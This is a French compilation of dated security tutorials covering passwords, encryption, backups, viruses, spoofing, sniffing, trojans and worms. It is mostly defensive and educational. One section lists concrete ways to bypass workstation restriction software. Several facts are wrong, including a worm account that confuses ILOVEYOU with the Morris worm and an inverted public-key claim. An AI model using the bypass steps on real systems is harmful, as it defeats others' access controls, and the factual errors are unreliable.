Il peut y avoir plusieurs rôles pour un firewall : certains sont filtreurs de paquets, routeurs, passerelles, ordinateur bastion, etc ... Il y a aussi une large variété de firewalls pour chaque système d'exploitation : UNIX, Novell Netware, Windows NT, LINUX, etc... De nos jours, les firewalls sont des remparts efficaces contre les agresseurs de toutes sortes. Toutefois, si un firewall n'est pas proprement installé, il peut se révéler pire que de ne pas en avoir à cause du faux sentiment de sécurité qu'il procure.

2. La protection des mots de passe et la création de mots de passe sûrs

La protection des mots de passe est un des principaux problèmes de la sécurité sur Internet bien qu'il existe des solutions pour lutter efficacement contre ce dernier :

- les mots de passe " shadow "

- la génération de mots de passe sûrs.

2.1. Les mots de passe " shadow "

Les mots de passe " shadow " sont un système où le fichier de mots de passe cryptés est caché de tous les utilisateurs excepté l'administrateur, en espérant empêcher les tentatives de crackage de mots de passe à la source.

2.2. La création de mots de passe sûrs

Premièrement, il serait intéressant de voir combien de mots de passe possibles il existe. La plus part des gens sont inquiets que des programmes comme " crack " vont éventuellement gagner en puissance jusqu'à ce qu'ils soient capables d'effectuer un recherche exhaustive de tous les mots de passe possibles pour rentrer dans un compte utilisateur spécifique (généralement administrateur).

Les mots de passe valides sont créés à partir de 62 charactères [A-Za-z0-9] et ils peuvent inclure encore plus de charactères comme : " \}][{$££@ !%&(#/)=-:_.;,?">< ". Ils doivent également être de longueur comprise entre 5 et 8 charactères. En utilisant seulement les 62 charactères communs, la taille de la série de mots de passe valides est : 625+626+627+628 = 2,2 E+14. Un nombre qui est bien trop grand pour entreprendre une recherche exhaustive avec les technologies actuelles. De plus, si l'on peut utiliser les 95 charactères, qui ne sont pas des charactères de contrôle, dans les mots de passe, cela réduit d'autant plus les chances du cracker de mots de passe.

Par contre, n'importe quel mot de passe qui est dérivé d'un dictionnaire (ou d'information personnelle), même modifié constitue un mot de passe potentiellement crackable. Par exemple les mots de passe basés sur les :

- noms de login : monlogin

- noms famille : dupond, durand

- prénoms : Raoul, Adrienne

- mots écris à l'envers : enneirda, dnopud

- mots d'un dictionnaire : ordinateur, livres

- mots en capitales : Ordinateur, OrDiNateuR

- mots des dictionnaires de cracking : porsche911, 123456789, azerty, abcxyz, mr.spoke

- mots de langues étrangères : hello!, gutentag

Un bon mot de passe doit toutefois être facile à se souvenir mais difficile à cracker. Le meilleur moyen de créer un mot de passe incrackable est de le faire apparaitre comme défini au hasard. Il ne faut pas oublier d'insérer des chiffres et des signes de pontuation dans le mot de passe. La méthode favorite pour trouver un mot de passe incrackable mais facile à se souvenir est de :

1. Prendre une phrase ou une ligne d'un poême ou d'une chanson qui doit être d'au moins long de 8 mots

2. Prendre la première lettre de chaque mot et l'utiliser dans le mot de passe.

3. Utiliser les signes de pontuation

Par exemple, la phrase : " Un pour tous, et tous pour un " donne un mot de passe relativement incrackable : " Upt,&tp1 "

Un bon moyen pour un administrateur réseau de savoir si les utilisateurs ont des mots de passe sûrs est d'utiliser les programmes de crackage de mots de passe sur son propre système comme le ferait un cracker. " Crack " est un bon outil pour s'assurer que les utilisateurs de système UNIX n'ont pas choisis des mots de passe facilement crackable qui apparaissent dans les dictionnaires standards.

3. La cryptographie

La cryptographie est la technologie qui permet d'envoyer des messages qui ne peuvent être compris (décryptés) que par le destinataire en améliorant les contrôles sur les messages routés par l'Internet, et en améliorant la qualité du système d'exploitation à abaisser les défauts des programmes et d'autres vulnérabilités de sécurité. Il y a deux principaux types de cryptage : le cryptage asymétrique (appelé aussi cryptage à clé publique) et le cryptage symétrique.

3.1. Le cryptage asymétrique ou à clé publique

C'est un système cryptographique qui utilise deux clés : une clé publique connue de n'importe qui et une clé secrète connue uniquement du destinataire du message.

Par exemple : Quand Jean veut envoyer un message sûr à Paul, il utilise la clé publique de Paul pour crypter son message. Ensuite Paul utilise sa clé privée pour le décrypter.

Un élément important au système de clé publique est que les clés publique et privée sont en relation de telle facon que seulement la clé publique peut être utilisée pour crypter le message et seulement la clé privée correspondante peut être utilisée pour le décrypter. Deplus, il est virtuellement impossible de déduire la clé privée si on ne connait pas la clé publique.

3.2. Le cryptage symétrique

C'est un type de cryptage où la clé utilisée pour crypter et décrypter le message est la même. Le cryptage de type DES (Data Encryption Standard) est une des plus célèbre forme de cryptage symétrique. Il est d'ailleurs toujours utilisé par les administrations aux Etats-Unis pour envoyer des données à travers un réseau. Toutefois, elles utilisent le système de cryptage à clé publique pour envoyer la clé DES au destinataire du fichier crypté !

4. IP spoofing et SYN flooding

Avec la technologie actuelle du protocole IP, il est impossible d'éliminer les paquets spoofés. Mais il existe quelques solutions pour réduire le nombre de paquets spoofés entrant et sortant du réseau.

La meilleure méthode est d'installer un routeur-filtreur qui limite les entrées à l'interface externe (connue sous le nom de filtreur d'entrée) en n'accordant pas le droit d'entrée à un paquet qui a une adresse source du réseau interne. Il peut aussi être bon de filtrer les paquets sortants qui ont une adresse source différente du réseau interne afin de prévenir une attaque d'IP spoofing provenant du réseau interne.

La combinaison de ces deux routeurs-filtreurs doit empêcher les agresseurs extérieurs d'envoyer des paquets prétendants venir du réseau interne. Cela doit également empêcher les paquets provenants du réseau interne de se prétendre venir de l'extérieur du réseau. Ces filtreurs ne vont pas stopper toutes les attaques de type TCP-SYN du moment que les agresseurs extérieurs peuvent spoofer leurs paquets de facon qu'ils proviennent d'autres sites extérieurs, et les agresseurs internes peuvent toujours envoyer des attaques spoofing avec des adresses internes.

5. Les outils de vérification de la sécurité

Il existe de nombreux ooutils disponible sur l'Internet pour tester la sécurité d'un système. Certains outils scannent les systèmes pour connaitre leurs vulnérabilités, d'autres vérifient l'intégrité des fichiers. L'administrateur réseau est fortement conseillé d'utiliser ces outils avant les agresseurs si il veut éviter les problèmes les plus courants.

6 La sécurité à travers l'obscurité

C'est une manière de considérer qu'un système ne peut être sûr que aussi longtemps que personne, en dehors des personnes qui l'ont créé, n'ait compris son fonctionnement interne. La technique est de cacher les comptes utilisateurs, les mots de passe dans des fichiers exécutables ou des programmes avec l'espoir que personne ne les trouvera.

C'est une philosophie qui a la faveur des bureaucrates américains. La principale critique de cette technique est que ce n'est que de la pseudo-sécurité car elle ne résoud pas les vrais problèmes de sécurité mais à la place, les cache. De plus, le responsable du petit groupe qui a créé ce système doit faire confiance aux employés pendant toute leur vie. Et si les employés ont une meilleure offre de salaire ailleurs, les connaissances s'envont avec eux que les connaissance soient remplacables ou non.

Toutefois, cette technique peut rentrer en complément d'autres mesures de sécurité.

7. La restriction d'IP

La restriction d'IP sert à limiter les utilisateurs à se connecter à certaines parties du serveur. En accordant seulement quelques adresses IP à se connecter au serveur, l'agresseur n'aura pas l'accès aux domaines où il peut causer des dommages.

8. L'éducation et la prise de conscience

Une des craintes majeures pour la sécurité d'un système n'est pas les trous techniques de sécurité d'un système mais le manque de conscience des utilisateurs ou de l'administrateur. Par " manque de conscience ", je veux dire que les utilisateurs d'Internet ont souvent l'impression que le seul moyen par lequel un hacker peut rentrer dans leur compte ou sur un système est en utilisant trappe laissée ouverte par un administrateur non-conscencieux. Une autre croyance est qu'il n'y a aucune valeur dans un simple compte utilisateur et que personne ne va s'ennuyer à essayer de le pénétrer. Aussi bizarrement qu'il puisse paraitre, ce qu'un agresseur trouve d'intéressant dans un compte utilisateur est tout simplement l'accès au système. Un simple accès permet à l'intrus de devenir super-utilisateur après avoir exploité une faille dans le système d'exploitation du système ou bien le compte peut être utilisé comme passerelle pour attaquer d'autre sites. Bien évidemment, l'utilisateur victime est responsable de se qui se produit sur son compte, d'où l'intéret de le protéger correctement.

Un bon moyen pour faire prendre conscience aux utilisateurs de l'importance de leur compte (et donc de leur mot de passe) est de prendre des mesures strictes en les encourageant :

- à changer leur mot de passe après la premiere connexion,

- à ne pas partager leur compte avec qui que ce soit,

- à protéger leur mot de passe : être prudent des regards indiscret au moment de taper le mot de passe,

- à changer leur mot de passe régulièrement et tout spécialement après s'être connecté sur une machine éloignée,

- à choisir des mots de passe sûrs

Un autre moyen d'impliquer les utilisateurs à respecter les mesures de sécurité sur un système est de leur faire signer une charte de responsabilité et de bonne conduite sur l'Internet. La sécurité est l'affaire de tous sur un système : l'administrateur aussi bien que les utilisateurs. Et le rôle de l'administrateur est d'éduquer ses utilisateurs à la sécurité.

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
Travaillez en sécurité

Il ne faut pas badiner avec la sécurité. Si vous êtes un particulier et que vous n'utilisez votre PC que vous faire des jeux, ousurfer sur Internet, ça vous est égal que votre PC soit fichu (a part financièrement bien entendu...) Mais si vous utilisez votre machine à des fins de production de documents, et dans le cadre de votre travail, c'est une autre histoire, et dans ce cas, même la meilleure assurance du monde ne pourra JAMAIS vous rendre vos innombrables précieuses heures de travail perdues...

En fait, il vaut mieux prévenir que guérir : C'est comme la cigarette; C'est un peu tard pour s'arrêter de fumer une fois qu'on a un cancer du poumon. En informatique, c'est pareil. NON, ça n'arrive pas qu'aux autres !

1. Sauvegardez régulièrement vos documents

Ne prenez pas la mauvais habitude d'écrire un document pendant une heure ou deux, et de sauvegarder tout à la fin. C'est trop tard. Si, 2 minutes avant que vous ne sauvegardiez, il y a une panne de courant, ou simplement, le PC plante, vos deux heures de travail sont perdues. DONC : Première bonne habitude : Dès que vous commencez un document : CTRL-S (c'est le raccourci clavier de Fichier/Enregistrer. ça marche avec tous les programmes fonctionnant sous Windows). Voua ellez boire un café : Ctrl-S. Le téléphone sonne ? Ctrl-S. Cette combinaison de touche doit être omniprésente dans votre esprit. Il peut arriver n'importe quoi, votre document sera enregistré. Il y a les sauvegardes automatqiues me direz-vous... Mais entre nous, quand on vous appelle et que vous n'êtes pas là, pensez-vous vraiment que votre répondeur téléphonique va mieux répondre au téléphone que si c'est vous-même qui décrochez ? C'est le même principe. Ne laissez pas un processus automatique dont vous ne connaissez que vaguement le fonctionnement vous prendre en charge !

DONC :
Sauvegardez tout le temps, tout le temps, tout le temps

2. Ne videz pas la corbeille

Vous savez pourquoi la corbeille a été créée ? Justement, pour pouvoir aller rechercher des fichiers qu'on aurait malencontreusement effacés. Ne vous inquiétez pas, une fois qu'elle est trop pleine, les plus anciens fichiers jetés seront effacés automatiquement de la corbeille. Donc, si vous pensez être "Propre" en vidant tout le temps la corbeille, vous vous fourrez le doigt dans l'oeil, et je jour ou vous aurez VRAIMENT besoin d'un fichier que vous avez jeté par erreur, vous allez bien comprendre ce que je veux dire. Donc : On ne vide PAS la corbeille. (On la vide éventuellement quand on vend son PC par exemple, ou on efface un fichier compromettant qui était à la corbeille, histoire d'interdire sa récupération, mais c'est tout)

DONC :
- Laissez vivre votre corbeille : Elle est là pour VOUS aider

3. Les disquettes sont fragiles

Vous avez trouvé l'astuce : Plutôt que de laisser de précieux documents sur votre disque dur, sur votre place de travail, vous les stockez sur disquette. Mais ce qu'il faut savoir, c'est qu'une disquette est fragile. TRES fragile : Un aimant, une chute sur la moquette bourrée d'électricité statique, un séjour en soleil, ou même rien de tout cela, et votre disquette devient totalement inutilisable. Donc, si vous êtes de ceux qui pensez que vous avez bien en sécurité au fond d'un coffre, l'exemplaire unique de vos fichiers sensibles sur des disquettes bien emballées se trompent totalement. Moi-même ai du jeter environ la moitié des disquettes qui traînaient de cette façon au fond d'une armoire depuis 2 ans. En parlant de disquettes, achetez toujours de bonnes marques, plus chères, mais Ô combien plus fiables.

DONC :
- Une copie de sécurité sur disquette, c'est bien, MAIS il FAUT garder une copie sur le disque dur

4. Votre disque dur aussi est fragile

Un dique dur, c'est une pièce mécanique, comme une lessiveuse. Il ne faut pas se demander SI il va se casser la figure, mais QUAND il va se casser la figure. Vous savez ce que c'est, le MTBF ? Ce sont les initiales de Middle Time Between Failure. En français : Temps Moyen Entre les Pannes. C'est à dire que chaque matériel, justement comme un disque dur est testé chez le constructeur, torturé jusqu'à ce qu'il casse. Et fatalement il casse un jour. C'est ainsi que les constructeurs établissent le MTBF : Un disque dur à par exemple un MTBF de 12000 heures. C'est à dire qu'il va tomber en panne en moyenne après 12000 heures de fonctionnement. Si vous avez de la chance, il tiendra 30000 heures, mais il POURRAIT voler en éclat après 200 heures d'utilisation (si c'est une mauvaise série).

DONC :
- Une copie sur votre disque dur, c'est bien, une autre copie sur disquette, c'est mieux, mais si votre disque dur vole en morceaux, et que soit les disquettes de sauvegardes sont obsolètes, soit soient illisible, il faut avoir un Backup (copie de sauvegarde) soit sur Jaz (disque dur amovible), soit sur bande magnétique, soit sur un autre disque dur.

A la limite on peut se passer de disquettes. Personnellement, j'utilise un Jaz de 2Gb. Je fais le backup de tous les fichiers créés dernièrement automatiquement à chaque démarrage de mon PC. Ensuite, je ne me contente pas d'un Jaz. J'en fait régulièrement un 2ème, chaque semaine, que j'emmène dans un endroit extérieur à mon domicile. Car, aussi efficaces que soient mes sauvegardes, je ne suis pas à l'abri d'un vol, d'un incendie ou d'une inondation, qui fichent tout en l'air. Comme je l'ai dit plus haut : Je suis assuré pour le matélriel, mais pas pour les innombrables heures de travail fourni... Donc, dans le pire des cas, si le Jaz que je pose à l'extérieur de mon domicile a été posé depuis 6 jours, et que, malheur, juste le jour avant de faire une nouvelle sauvegarde, mon appartement prend feu, je ne perd que 6 jours de travail. Je sais EXACTEMENT ce que je risque A QUEL MOMENT. J'ai vraiment limité les dégâts.

Si vous travaillez dans une entreprise qui fait elle-même les sauvegardes... Peut-être vous reposez-vous sur le travail de l'administrateur. Faites donc un test : Créez un fichier Lundi qui s'appelle "Très important.DOC". mardi après midi, allez voir l'administrateur système, et dites lui que vous avez créé un fichier "Très Important.DOC", mais que quelqu'un l'a effacé par erreur mardi matin ou lundi soir par exemple. Ecoutez attentivement ce qu'il vous dit : Peut-il récupérer votre fichier ? Ne le peut-il pas ? Le peut-il sous certaines conditions ? Cette situation me fait un peu penser lorsqu'on souscrit une assurance : Lorsqu'il s'agit de payer ses primes, tout va bien : Mais c'est quand il arrive un malheur que plein de choses n'étaient pas couvertes, et que finalement, on se retrouve avec un remboursement ridicule...

DONC :
- Soyez comme Saint-Thomas : Ne croyez que ce que vous voyez

5. Gare aux intrus

Attention aux personnes mal intentionnées ou indiscrètes qui voudraient s'emparer de vos fichiers. Mettez des mots de passe : A l'ouverture de votre PC, sur votre écran de veille, et sur vos fichiers. Comme ça, si un voleur veut vous prendre un fichier, il pourra, mais il ne pourra PAS le lire. Attention toutefois, consultez Les astuces de protection Word pour plus de détails quant à la protection des fichiers. Il pourra de rage les effacer, mais comme vous aurez sagement fait une copie de sécurité en lieu sûr, ce n'est pas bien grave...

DONC :
- Mots de passe difficiles et sauvegardes régulières vous protègeront de bien des déconvenues

6. Les virus

Comme vous le savez, ce sont des programmes insidieux qui s'einstallent sur votre ordinateur, et font des choses diverses, qui vont de l'envoi de courrier E-Mail a votre insu, jusqu'à la création de fautes d'othographes à l'impression, en passant par le retournement de l'écran et l'effacement de votre disque dur. Il existe des dizaines de milliers de virus DIFFERENTS qu'on peut contracter par une disquette qu'on vous donne, ou simplement en allant sur Internet. Prenons l'exemple du virus Vendredi 13. Dès que vous l'avez attrapé, il ne fait rien. Il incube. Il se multiplie. Chaque fois que vous mettez une disquette, il saute dessus. Il saute également sur vos Jaz, et sur vos CD (UNIQUEMENT si vous avez un graveur de CD). Il se promène également sur le réseau. Enfin bref, en quelques temps, il s'est multiplié partout, sans qu'on le voie. Et un (beau) jour, dès qu'il constate qu'on est un vendredi 13, il s'active, et bousille tout votre disque dur... Tout est planté... Bon.. Pas de problème, vous réinstallez Windows 98, vos programmes, et vous récupérez vos sauvegardes depuis le Jaz... Maiiiiiis, le virus a eu largement le temps d'infecter votre Jaz, et dès que vous récupérez vos données, vous récupérez aussi le virus, qui va s'empresser, dès le prochain Vendredi 13 de recommencer ses méfaits... Et vous ne pouvez plus vous en débarasser

DONC :
- Installez un BON antivirus (le meilleur que je connaisse est Norton Antivirus 5) AVANT de choper un virus : Il est MILLE fois plus facile d'empêcher un virus d'entrer que de le faire sortir.


______________________________________________________

Pour commencer à sécuriser un réseau connecté à l'internet (donc réseau local relié au net), il faut d'abord le sécuriser en tant que réseau local: c'est-à-dire que des protections doivent être mises en oeuvre pour éviter qu'un utilisateur de ce réseau ne fasse des manoeuvres dangereuses, éxécute des virus ou des trojans, que ce soit intentionnel ou inintentionnel. Le problème des virus et trojan est déjà traité dans les autres tutoriaux, donc on va traiter des erreurs de manipulations ou attaques voulues, de l'intérieur du réseau.

Le premier danger est le fait qu'un utilisateur puisse avoir accès à chaque poste en réseau (dont le serveur), depuis un seul poste. Mettez alors des restrictions (exemple: sous Windows, partagez les répertoires avec accès en mot de passe, ou accès limité), ou mieux: des programmes qui mettes des restrictions qui SEMBLENT incassables. Il existe donc de nombreux programmes qui empêche un utilisateur d'avoir les icones sur le bureau, d'accéder à l'explorateur windows, etc... Mais en réflechissant bien, il y a foule de moyens d'accéder à la session administrateur (le programme ne met plus de restrictions): soit en effaçant complètement le programme, ses .dll, ou en trouvant le pass.

La première solution requeirt un minimum d'accès à certains programmes, si vous pouvez accéder à:- Wordpad: demandez à ouvrir un fichier, non pas .txt ou .doc, mais en *.* recherchez le programme sécurisant le pc, effacez tout.- Dans le menu Démarrer, Executer: tapez C: ou D: selon le lecteur mis en cause- IE, Netscape navigator: dans la barre blanche ou l'on met l'adresse url tapez: C:, ou mieux: Poste de travail. Faites attention car à partir du poste de travail on peut agir sur TOUT! - Arretez l'ordinateur et demandez à le faire redémarrer en Mode MS-DOS: à partir de là, vous pouvez accéder à tout, sans restrictions. - Des outils graphiques: au lieu de rechercher à ouvrir un format d'image précis, cherchez en *.* et amusez vous. - Winzip, ou autres: faites dans Winzip, File - Open Archives et ouvrez en *.* - etc... Il y a foule de programmes avec lesquels on peut casser une sécurité.

La deuxième solution requiert à l'utilisateur d'avoir un minimum d'infos sur l'utilisateur, ou encore de trouver les fichiers sensibles (par exemple: il existe des fichiers d'aide -accessibles même en restricted acces grâce aux moyens présentés ci dessus- qui, si on a perdu le mot de passe, explique comment le retrouver!!). Il n'y a pas de réelles solutions dans ce cas là, sauf mettre un pass au BIOS (qui peut toujours se cracker, selon différentes méthodes mais qui demandent du temps), ce qui rebutera même les plus avertis.

En conclusion, ce tutorial est trop court pour réellement vous montrer toutes les façons de vous protéger, mais il est récapitulatif de ce que vous devez savoir pour minimiser les risques de piratage. En réalité, expliquer en profondeur comment sécuriser un réseau (protections par firewalls, savoir connecter quel routeur sur quel proxy, etc...), est BEAUCOUP trop long, et je pense que de toute façon il n'y a pas beaucoup d'administreur réseaux qui vont lire ce tutorial, sauf s'ils sont vraiment passionnés par le sujet.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________

1. Le système de fichiers en réseau

A chaque fois qu'un utilisateur fait une requête pour accéder à un fichier, le système d'exploitation décide si oui ou non l'utilisateur à le droit d'accéder au fichier en question. Le système d'exploitation prend une décision basée sur qui est le propriétaire du fichier, qui demande à accéder au fichier et quelles permissions d'accès le propriétaire à mis. Les permissions d'accès déterminent qui aura accès au fichier.

Il y a deux principales raisons pour que l'on protège ses fichiers des autres utilisateurs. La première raison est que l'on peut souhaiter protéger le contenu de ses fichiers des autres utilisateurs. On peut considérer le contenu du fichier comme privé et on ne veut pas que les autres utilisateurs soit capable de lire ou de modifier le contenu du fichier. La seconde raison est que si des tierces personnes peuvent modifier des fichiers, elles peuvent aussi obtenir l'accès au compte. Par exemple, si un utilisateur malintentionné a l'accès "écriture" dans le répertoire racine, il peut alors créer ou modifier le fichier ".rhost" (sous UNIX) qui donne un accès illimité à n'importe qui au compte. Il va sans dire, comme l'utilisateur est responsable de son compte, que tous les "dégats" engendrés sont sous sa responsabilité directe.

Le principal but pour une personne qui cherche à s'introduire dans un système est d'obtenir l'accès administrateur (root). Cet accès permet à la personne de faire tout ce qu'elle désire sur un système, elle peut effacer, modifier ou ajouter de nouveaux fichiers. La plus part des intrusions où le hacker obtient l'accès administrateur commencent quand l'intrus pénètre dans un compte utilisateur normal. Une fois sur la machine en tant qu'utilisateur sans privilège particulier, le hacker peut alors lancer une attaque pour obtenir l'accès "super utilisateur" sur la machine en utilisant un trou de sécurité dans le système d'exploitation.

2. Le social engineering

C'est un terme utilisé parmis les hackers pour une technique d'intrusion sur un système qui repose sur les points faibles des personnes qui sont en relation avec un système informatique plutôt que sur le logiciel. Le but est de piéger les gens en leur faisant révéler leur mot de passe ou toute autre information qui pourrait compromettre la sécurité du système informatique.

Le piège classique est de faire croire aux utilisateurs du système que leur mot de passe est demandé d'urgence par le ou les techniciens. Le hacker mentionera qu'il a besoin du mot de passe pour d'importants travaux d'administration du système et il demandera à se qu'on lui envoie le mot de passe par mail. Il faut savoir, comme nous le verrons plus loin, qu'il est possible pour le hacker de créer un e-mail faisant croire qu'il provient de quelqu'un que l'on croit être le légitime administrateur réseau. Souvent, le hacker enverra le message à tout les utilisateurs du système en espérant que plusieurs utilisateurs tomberont dans le piège. Bien évidemment si la ruse se déroule par téléphone, le hacker imitera la voix du technicien.

Une autre forme de social engineering va jusqu'à deviner le mot de passe d'un utilisateur. Les gens qui peuvent trouver des informations sur un utilisateur, peuvent utiliser ces informations pour deviner le mot de passe de ce dernier. Par exemple, le prénom de ses enfants, leur date de naissance ou bien encore la plaque d'immatriculation de sa voiture sont tout à fait candidat à être des mots de passe. Les hackers peuvent aller très loin pour deviner les mots de passe.

3. Le " crackage " de mot de passe

Les mots de passe sont très important parce qu'ils sont la première ligne de défence contre les attaques sur un système. Ceci peut être établit simplement : si un hacker ne peut pas interagir sur un système distant et qu'il ne peut pas ni lire ni écrire dans le fichier des mots de passe alors il n'a quasiment aucune chance de développer une attaque couronnée de succès sur ce système. C'est également pourquoi, si un hacker peut au moins lire le fichier des mots de passe sur un ordinateur distant, il aura aussi la possibilité de cracker un des mots de passe contenu dans ce fichier. Si il en parvient, alors on peut penser qu'il pourra se connecter sur ce système et qu'il pourra s'introduire en tant qu'administrateur en passant par un trou de sécurité dans le système d'exploitation.

La manière la plus classique qu'un hacker va essayer d'obtenir un mot de passe est par l'intermédiaire d'une attaque avec un dictionnaire. Dans ce genre d'attaque, le hacker utilise un dictionnaire de mots et de noms propres, et il les essaie un à un pour vérifier si le mot de passe est valide. Bien évidemment, ces attaques ne se font pas " à la main ", mais avec des programmes qui peuvent deviner des centaines voire des milliers de mots de passe à la seconde. Ce procédé est d'autant plus facile, qu'il lui permet de tester des variations sur ces mots : mots écrits à l'envers, majuscules et minuscules dans le mot, ajout de chiffres à la fin du mot, etc ... De plus la communauté des hackers a construit de gros dictionnaires spécialement conçus pour cracker les mots de passe. En utilisant des mots de langues étrangères, ou des noms de choses, de personnes ou encore de villes, n'est d'aucun effet contre ces dictionnaires. Le plus connu des programmes utilisé pour cracker les mots de passe est " Brutus " avec son dictionnaire de 50 000 mots.

4. Le " sniffing " des mots de passe et des paquets

Si un hacker ne peut pas deviner un mot de passe, alors il a d'autres outils pour l'obtenir. Une façon qui est devenue assez populaire est le " sniffing " de mots de passe. La pluspart des réseaux utilisent la technologie de " broadcasting " ce qui signifie que chaque message (ou paquet) qu'un ordinateur transmet sur un réseau peut être lu par n'importe quel ordinateur situé sur le réseau. En pratique, tous les ordinateurs sauf le destinataire du message vont s'apercevoir que le message n'est pas destiné pour eux et vont donc l'ignorer. Mais par contre, beaucoup d'ordinateurs peuvent être programmés pour regarder chaque message qui traverse le réseau. Si une personne mal intentionnée fait ceci, alors elle pourra regarder les messages qui ne lui sont pas destinés.

Les hackers ont des programmes qui utilisent ce procédé et qui scannent tous les messages qui circulent sur le réseau en repérant les mots de passe. Si quelqu'un se connecte sur un ordinateur à travers un réseau et que des ordinateurs ont été compromis par le procédé de sniffing, alors cette personne risque contre son gré de donner son mot de passe. C'est pourquoi il existe une menace sérieuse pour les personnes qui se connectent sur des ordinateurs distants (par exemple en utilisant Telnet). Toutefois, si quelqu'un se connecte sur la console d'un système (et non pas sur un terminal), son mot de passe ne ciculera pas sur le réseau ou il pourrait faire l'objet d'un sniffing. Mais si une personne se connecte sur un autre réseau ou à partir d'un prestataire de service Internet, alors dans ce cas elle sera dépendante de la sécurité de ces réseaux.

5. L'IP spoofing

L'adresse IP d'un ordinateur est l'adresse qui est utilisée pour reconnaitre un ordinateur sur Internet. Elle est présumée valide lorsqu'elle est certifiée par les services TCP et UDP. Un des principaux problèmes est que en utilisant le routage source d'IP, l'ordinateur du hacker peut se faire croire comme étant un ordinateur connu. Brièvement, le routage source d'IP est une option qui peut être utilisée pour spécifier une route directe à une destination et renvoyer le chemin de retour à l'expéditeur. La route peut inclure l'utilisation d'autres routeurs ou de server qui n'auraient normalement pas été utilisés pour faire suivre les paquets à la destination finale. Voici un exemple qui montre comment ceci peut être utilisé de telle facon que l'ordinateur de l'intru apparaisse comme étant l'ordinateur certifié par le serveur :

- L'agresseur change l'adresse IP de son ordinateur pour faire croire qu'il est un client certifié par le serveur

- Il va ensuite construire une route source jusqu'au serveur qui spécifiera le chemin de retour direct que les paquets IP devront prendre pour aller au serveur et qu'ils devront prendre pour retourner à l'ordinateur de l'agresseur en utilisant le client certifié comme dernière étape dans la route vers le serveur.

- L'agresseur envoie une requête client au serveur en utilisant la route source.

- Le serveur accepte la requête du client comme si elle provenait directement du client certifié et retourne une réponse au client.

- Le client, utilisant la route source, fait suivre le paquet à l'ordinateur de l'agresseur.

Beaucoup de machine de type UNIX acceptent les paquets de route source et les redirigent comme la route source l'indique. Beaucoup de routeurs acceptent également les paquets de route source bien que certains d'entre eux peuvent être configurer pour bloquer ces paquets.

Une autre manière encore plus simple pour " spoofer " un client est d'attendre que le système client ait éteint sa machine et de se faire passer ensuite passer pour ce dernier. Dans beaucoup d'entreprises, les employés utilisent des PC's et des réseaux TCP/IP pour se connecter sur des serveurs locaux UNIX. Les PC's utilisent souvent NFS pour obtenir un accès aux répertoires et aux fichiers du serveur (NFS utilise les adresses IP uniquement pour autentifier les clients). Un intru pourrait configurer un PC avec le même nom et la même adresse IP qu'un autre ordinateur, et alors essayer de lancer des connexions au serveur UNIX comme si il était le " vrai " client. Ceci est très simple à réaliser et ressemblerait à une attaque de l'intérieur. Les courriers électroniques sur Internet sont particulièrement sujet au spoofing car très facile à réaliser. Les courriers électroniques sans l'ajout d'une signature digitale ne peuvent pas être d'origine fiable. Par exemple, considérons que l'échange prenne place quand des serveurs Internet échange un courrier électronique. Cet échange a lieu en utilisant un simple protocol consistant en une série de commandes en caractères ASCII. Une personne maligne pourrait facilement entrer ces commandes à la main en utilisant Telnet pour se connecter directement au port SMTP (Simple Mail Transfer Protocol) du système (port 25 sur les systèmes UNIX). Le serveur recevant ces commandes fait confiance à cette personne en disant qui elle est. D'où le fait que le courrier électronique peut lui aussi être spoofé facilement en entrant une adresse d'expéditeur différente de l'adresse réelle. Comme quoi, sans aucun privilège, on peut sans problème falsifier ou spoofer le courrier électronique.

D'autres services comme le " Domain Name Service " peuvent ausi être spoofés mais avec toutefois plus de difficultés que le courrier électronique. Ces services représentent une crainte qui mérite d'être considérée quand on les utilise.

6. Les chevaux de Troie ou Trojans

Un cheval de Troie est un programme qui se cache lui même dans un autre programme apparemment au dessus de tout soupcon. Quand la victime (l'utilisateur normal) lance ce programme, elle lance par la même le cheval de Troie caché.

Il y a des exemples de chevaux de Troie UNIX sur l'Internet. Par exemple, en 1995, un serveur FTP bien connu a été pénétré et les agresseurs ont modifié un programme très populaire disponible sur ce site. Le cheval de Troie installé à l'intérieur du programme permettait quand il était exécuté d'ouvrir l'accès au système UNIX à n'importe qui.

7. Les vers

Un ver est un agent autonome capable de se propager sans l'utilisation d'un programme quelconque ni d'une action par une personne. La plus célèbre attaque de vers est bien sûre celle du virus I LOVE YOU. Dans les 8 heures après le lancement de ce programme, entre 2000 et 3000 ordinateurs étaient déjà infestés. Les ordinateurs commencèrent à tomber en panne parce que le programme du ver réapparaissait plus rapidement que les connexions réseaux pouvaient l'effacer.

Que s'est-il exactement passé ? Le ver infestait seulement les ordinateurs fonctionnant sur un système UNIX particulier. Chaque ver créait une liste de machines distantes cibles qui se trouvait sur l'ordinateur où le ver agissait. En parallèle, le ver : - essayait de trouver les mots de passe des comptes utilisateurs en essayant des permutations à partir des noms de comptes et en vérifiant une liste de 432 mots de passe courants. - essayait d'entrer dans chaque machine cible en se faisant passer pour un utilisateur de la machine " attaquante " (après avoir cracké le mot de passe utilisateur) et en utilisant un " bug " dans le protocole " finger ".

Quand une attaque fonctionnait, le ver créait un petit programme et les commandes pour compiler et exécuter sur la machine distante. Ce ver avait aussi des mechanismes qui lui permettaient de camoufler sa présence sur une machine. C'est une méthode utilisée par les hackers quand un nouveau " bug " est découvert dans un système d'exploitation. Cela a " l'avantage " pour l'agresseur de pouvoir attaquer un maximum de sites en peu de temps.

8. Les trappes

Une trappe est un point d'entrée dans un système informatique qui passe au-dessu des mesures de sécurité normales. C'est généralement un programme caché ou un composant électronique qui permet au système de protection d'être inefficace. De plus, la trappe est souvent activée par un évènement ou une action " normale ".

Une trappe peut aussi être un trou de sécurité dans un système qui a été délibérément mis en place par les créateurs ou les personnes chargées de la maintenance. Le principal intéret de ces trappes n'est pas toujours néfaste : certains systèmes d'exploitations, par exemple, ont des comptes utilisateurs avec de hauts privilèges destinés pour faciliter le travail des techniciens de maintenance.

